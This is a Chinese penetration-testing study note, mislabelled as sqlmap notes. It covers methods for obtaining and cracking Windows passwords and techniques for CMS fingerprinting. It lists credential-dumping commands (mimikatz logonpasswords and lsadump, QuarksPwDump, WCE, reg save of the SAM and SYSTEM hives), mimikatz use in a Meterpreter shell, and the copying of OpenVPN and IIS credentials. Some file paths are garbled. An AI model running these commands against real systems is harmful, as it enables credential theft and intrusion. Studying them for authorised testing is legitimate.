sqlmap从入门到精通学习笔记(一)

1.1Windows密码获取与破解

1.1.1 Windows密码获取思路

1.通过系统常见漏洞(ms17-010)获取权限,直接使用权限读取密码
2.获得webshell,进行权限提升,在使用权限获取密码
3.内网使用NTscan扫描,暴力破解获取系统密码
4.物理接触获取密码(密码在C:Windowssystem32configsam文件中)

1.1.2 常见的Windows密码及hash获取工具

1.gethash

gethash $local //系统权限下获取本地账号hash值

2.gsecdump

gsecdump -a //获取本地所有账号哈希值

3.Quarsk PwDump

QuarksPwDump -dhl   //导出本地hash值
QuarksPwDump -dhdc  //导出内存中的域控hash值
QuarksPwDump -dhd   //导出域控hash值,必须指定NTDS文件

4.PwDump
5.mimakatz

privilege::debug
sekurlsa::logonpasswords

6.Windows Credentials Editor(WCE)

wce -a //获取所有账号的hash值

7.使用REG命令注册表导出文件

reg save hklmsam sam.hive
reg save hklmsystem system.hive
reg save hklmsecurity security.hite

………………

1.1.3 物理接触获取密码

主要是将上述路径(C:Windowssystem32config)中的sam、system、security三个文件拷贝走,通过离线的方式破解密码。
……
3.使用winlogonhack工具记录3389登录密码
……
6.在msf获取反弹的shell上获取密码
先使用mimikatz前先使用migrate 命令来迁移进程,在执行一下吗命令

load mimakatz      //加载mimikatz
kerberos           //获取网络认证协议凭证,其中可能会有明文的账号密码
msv                //获取msv凭证,其中包含LM和NTLM密码hash值
wdigest            //获取wdigest(摘要式身份验证)凭证,其中可能会有明文账号密码

7.IIS7配置文件密码读取

mimikatz.exe privilege::debug log "iis::apphost /in"%systemroot%system32inetsrvconfigapplicationHost.config "/live" exit

8.VPN密码获取

mimikatz.exe privilege::debug token::elevata lsadump::sam lsadump::secrets exit

9.OpenVPN获取配置及密码
如果发现安装有Open VPN,可在其安装目录中将config 文件全部复制到本地,重新覆盖后可用保存在本地的key进行登录
常见安装目录C:\Program FilesOpenVPNconfig
10.windows下浏览器、E-mail和远程桌面等密码获取工具
见https://www.cnblogs.com/KHZ521/p/14129057.html
11.数据库密码获取
可通过分析网站源代码从数据库配置文件中获取数据库连接信息(如:config、web.config等)
12.使用Cain、Ettercap等工具进行内网嗅探

1.1.4 密码hash破解方式

1.在线破解 推荐网站(https://www.cmd5.com
2.离线彩虹表破解

1.5 CMS指纹识别

1.5.1 指纹识别技术简介及思路

1.指纹识别技术
组件是网络空间中最小的单元,web应用程序、数据库、中间件等都属于组件。指纹是组件上能标识对象的一段特征信息,用来在渗透测试信息收集环节中快速识别目标服务。
2.指纹识别思路
一般可以通过在线第三方网站和开源程序来进行扫描,也可以结合文件头和反馈信息进行手工判断,指纹识别主要思路如下:

使用工具自动判断
在第三方网站进行在线测试
手工对比文件关键字、版权信息、后台登录路径、程序版本和robos.txt等固有文件进行查找、识别和对比,相同文件具有相同的MD5值或相同的属性

1.5.2

1.针对robots.txt文件识别
2.计算静态文件的MD5值(网站图标、html文件、js文件、images文件、CSS文件等)
3.请求响应主题内容或头信息匹配
4.针对url的关键字识别
5.基于tcp/ip请求协议识别服务指纹
6.在OWASP中识别web应用框架测试方法
(1)http头
(2)Cookie
(3)HTML源代码
(4)特殊文件和文件夹

原文地址:https://www.cnblogs.com/KHZ521/p/14370088.html